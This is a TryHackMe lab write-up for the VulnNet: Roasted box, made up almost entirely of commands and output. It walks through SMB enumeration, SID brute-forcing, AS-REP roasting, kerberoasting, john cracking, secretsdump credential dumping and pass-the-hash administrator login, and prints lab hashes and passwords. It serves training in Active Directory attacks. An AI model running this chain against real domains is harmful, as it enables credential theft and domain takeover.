TryHackMe VulnNet: Roasted

nmap

nmap -sV 10.10.120.99 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 18:54 EST
Nmap scan report for 10.10.120.99
Host is up (0.11s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-08 23:54:51Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.62 seconds

smb enumeration

smbclient -L 10.10.120.99
Password for [WORKGROUP\kali]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
	VulnNet-Business-Anonymous Disk      VulnNet Business Sharing
	VulnNet-Enterprise-Anonymous Disk      VulnNet Enterprise Sharing
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.120.99 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

---------

crackmapexec smb 10.10.120.99 -u guest -p "" --shares                                      
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\guest: 
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  [+] Enumerated shares
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  Share           Permissions     Remark
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  -----           -----------     ------
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  ADMIN$                          Remote Admin
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  C$                              Default share
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  IPC$            READ            Remote IPC
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  NETLOGON                        Logon server share 
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  SYSVOL                          Logon server share 
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  VulnNet-Business-Anonymous READ            VulnNet Business Sharing
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  VulnNet-Enterprise-Anonymous READ            VulnNet Enterprise Sharing

find users

python /opt/impacket/examples/lookupsid.py anonymous@10.10.120.99 | tee users.txt
Password:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.120.99
[*] StringBinding ncacn_np:10.10.120.99[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

┌──(kali㉿kali)-[~]
└─$ grep SidTypeUser users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt
                                                                                                                                                              
┌──(kali㉿kali)-[~]
└─$ cat users.txt                         
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

hash dumping

remember to add domain to /etc/hosts

python /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.120.99 -usersfile users.txt -no-pass vulnnet-rst.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:b13f5b2e257a0bd37f4d2f053afb37d6$de5f2754722379b801ab59cee4ba9247d0757a6eb2221edcce79f065192fa26d59db5bc6e7359ef43cef5dcd4c137610b62cd4ac7d45b6d36d0a5936a9896b65c174fbbd83764d0c4d6273907030c52469d8dafa4f1dcb7e64cd7e2d23d0a6846a6ef28afd4bfeef8d514515231c06df0d15fe3b595efca1baba9b3817191339522a0e12a6fb827492aff354d6774155f3fe32c60bf294590ba5a8fb8e42752154e3dd70769908a1414aacbe065471226c623056e015efabb96a3cea61d67180e23b4860e3e236621917aec193c7a86b8c958b4e4bd24a2022b0804fbc4f9c68b118ba203ce3f839c627cb4932d754402c3e242781da
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

hash cracking

john --wordlist=/usr/share/wordlists/rockyou.txt  hashes             
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889*        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)     
1g 0:00:00:02 DONE (2024-02-08 19:33) 0.3703g/s 1177Kp/s 1177Kc/s 1177KC/s tjalling..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

authenticated smb enumeration

crackmapexec smb 10.10.120.99 -u t-skid -p 'tj072889*'  --shares
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\t-skid:tj072889* 
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  [+] Enumerated shares
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  Share           Permissions     Remark
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  -----           -----------     ------
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  ADMIN$                          Remote Admin
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  C$                              Default share
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  IPC$            READ            Remote IPC
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  NETLOGON        READ            Logon server share 
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  SYSVOL          READ            Logon server share 
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  VulnNet-Business-Anonymous READ            VulnNet Business Sharing
SMB         10.10.120.99    445    WIN-2BO8M1OE1M1  VulnNet-Enterprise-Anonymous READ            VulnNet Enterprise Sharing

-----------------

kerberoasting

python /opt/impacket/examples/GetUserSPNs.py vulnnet-rst.local/t-skid:tj072889* -dc-ip 10.10.120.99 -request    
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName    Name                MemberOf                                                       PasswordLastSet             LastLogon                   Delegation 
----------------------  ------------------  -------------------------------------------------------------  --------------------------  --------------------------  ----------
CIFS/vulnnet-rst.local  enterprise-core-vn  CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local  2021-03-11 14:45:09.913979  2021-03-13 18:41:17.987528             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$vulnnet-rst.local/enterprise-core-vn*$d1714f39a060ff2cbd03c1d5150d8089$567a09a4a96005e57b44b1f3e3a5f176a67e385ac3578c7fb81a2b45c213635ad523750e2740aeaf90decfc28794e9c3300541ef400b410e1bf33dfe32563a757c204aaeec297bbb2f232ec52fb3f5d72fe61381441b678eb5f91a2d5694af815c79565c7c0c2cf38932012e66dd2a7c0c92e04c5215bc586cc9e2eedb7ad48fe0f549a26be3edbbfceb66a574df8972280cf8bb83aef93a6e2c96a8f82b40f56c4afbc1054c6718053620ec1daeea0222297252b5f16539081f4014ec80460ac2e0873f400759bfdd2f8166a9a05b506c756a5797e2cb3c9ba63fb7d27f46951787d01b9cdc5c304fca66bee4dc690e78fc864492281314a82bcddbd65bf5ff66263ad22208c337d1cb365632596c812f1d4adc04d39705e193c670e225546735b17a2b952514a827f501d6d89197765a709616f188cd44f787798f007a536fc10280c2efc9fc93d3d9e7148b1a23ad4a8f3085235adfb7b94a1f98084da1607badaf70cbdfe31518bc2837f5f25aa6de8b72bc2f7a3852e4a95d60f7dd4331623003c87f0c9dea915a7bd95dd728153b0361f8472144fc2fc7427b7e38d27f85f0ad6d559a1b1dc0fc058eabe784dec03de1ffa70cce6d70122554d859af4d4a8b982d03d63356af987a3bd4d6d1b9dbad32d9ca55c9b0139f3b9f0861cda8e0c413e49cdba1ac9d185b864950909001e2c2d7a63e6c1214acee3ac7a4c1cfeb5453d933954bc73097793105eae083b83d641d3396e82c526f6da77e9bd5cd18b9181e9dbdc7c246824bcb07d09b8e8028b6d50f67e56ca92826e89b3a5758a2ec4b232741e2e32137fb88e8a5b0673f2317c8926688153dd3eddc998a6501887001f382a4b6e2851cdaec9bf922035eafa7071f724cf49837da1b90caa23b66620ec4cda62e2205723e6bfede6d3b11ae73be55cffac197cefdcf5373a8df03cfaad9424082968184c199b39c5aadc0fe4dfc7cf41de50525c48445f52b9c1db3c9ce87ba893e38f007595ce93ac116e66708311e70de37643cc14c6829fccee125a45f6ade1279c619653d0635b77425837ea1ec334c2329c94ee856e9589d72c5dba1060c54b7d996160e23a763b984e1336424c837d0129ef570dc959607f58c864260a03677c44927cd54aaea83d3675e85c2efd069fb1abc97c0db6fdc98161eb4bf24d8f298b94ee403e91691cdde4a1ad73d03e455f0b6c99f4412a816819e3f2b50bd93bdbce529662dc705e12fdc9bf956e231830afbe8b084bc14f966e4c82df8747d7fa820997c7092c97ca0e92c0232d47097b81188c18c6dfe871467b1cb91633a0ad0ac37802cd39a3a92911725ccc669cd6888f9d44ffb7e329ebed087fbd7f651ffc467a60bbf79453543e8f4d537ddfbcfab15

cracking it

john --wordlist=/usr/share/wordlists/rockyou.txt  hash                               
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ry=ibfkfv,s6h,   (?)     
1g 0:00:00:02 DONE (2024-02-08 19:43) 0.4524g/s 1858Kp/s 1858Kc/s 1858KC/s ryan2lauren..ry=iIyD{N
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

evil-winrm

evil-winrm -u 'enterprise-core-vn' -p 'ry=ibfkfv,s6h,' -i 10.10.120.99 -N     
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completion is disabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents>

this helped us get the user flag.

some more SMB enumeration

smbclient \\\\10.10.236.205\\SYSVOL -U enterprise-core-vn
Password for [WORKGROUP\enterprise-core-vn]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 11 14:19:49 2021
  ..                                  D        0  Thu Mar 11 14:19:49 2021
  vulnnet-rst.local                  Dr        0  Thu Mar 11 14:19:49 2021
cd vuln
		8540159 blocks of size 4096. 4187934 blocks available
smb: \> cd vulnnet-rst.local
smb: \vulnnet-rst.local\> ls
  .                                   D        0  Thu Mar 11 14:23:40 2021
  ..                                  D        0  Thu Mar 11 14:23:40 2021
  DfsrPrivate                      DHSr        0  Thu Mar 11 14:23:40 2021
  Policies                            D        0  Thu Mar 11 14:20:26 2021
  scripts                             D        0  Tue Mar 16 19:15:49 2021
c
		8540159 blocks of size 4096. 4187780 blocks available
smb: \vulnnet-rst.local\> cd scripts
smb: \vulnnet-rst.local\scripts\> ls
  .                                   D        0  Tue Mar 16 19:15:49 2021
  ..                                  D        0  Tue Mar 16 19:15:49 2021
  ResetPassword.vbs                   A     2821  Tue Mar 16 19:18:14 2021

		8540159 blocks of size 4096. 4187722 blocks available
smb: \vulnnet-rst.local\scripts\> get ResetPassword.vbs
getting file \vulnnet-rst.local\scripts\ResetPassword.vbs of size 2821 as ResetPassword.vbs (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec)

Inside this file we can find a user "a-whitehat" and his password

extract the hashes with this user

python /opt/impacket/examples/secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.236.205
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VULNNET-RST\WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:e15c59ee8e198aca3629e33c3e97f37827faaab34f475c83b76ffa53f83d58e7
VULNNET-RST\WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:de131f2343b586e21ba7f0867671f397
VULNNET-RST\WIN-2BO8M1OE1M1$:des-cbc-md5:8ad94f8613101694
VULNNET-RST\WIN-2BO8M1OE1M1$:plain_password_hex:5c51fad41849d3187783c78cc334ff666a46a49248a10e81a894e0bf6e20219d775cc61d35e34d0ff6a6bb3a378026bfcdc979abc624d19b78b8f448ec263757628eb786b3d47a2e638ea70f99c9898237d12750541632540fe3b82507e7ae542e43b1f20e1ccb473af2abf1bd15b8a7990bb4c6250e1e85b12522ae9a0ba0cc04d5d8e4932eb366f6be58e84974cc817f2265e85dcfdd65a887d882cea77e22edb84e47523e11245605eb1ff867c68e966022b5918e1253e6b8908e5e25527dc8d0dfe12ffc83fe7ed3fa4216b13aff427b6e51984b6abc3960e3e353f1e0345dec4ae1b9fcceb64842dc310a20c983
VULNNET-RST\WIN-2BO8M1OE1M1$:aad3b435b51404eeaad3b435b51404ee:875ff956b083d37e2e80d256e36deece:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x20809b3917494a0d3d5de6d6680c00dd718b1419
dpapi_userkey:0xbf8cce326ad7bdbb9bbd717c970b7400696d3855

evil-winrm -i 10.10.236.205 -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d"
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt

PreviousTryHackMe Blueprint NextTryHackMe Post-Exploitation Basics

Last updated 10 months ago

nmap

smb enumeration

find users

hash dumping

hash cracking

authenticated smb enumeration

kerberoasting

cracking it

evil-winrm

some more SMB enumeration

extract the hashes with this user

login with admin's hash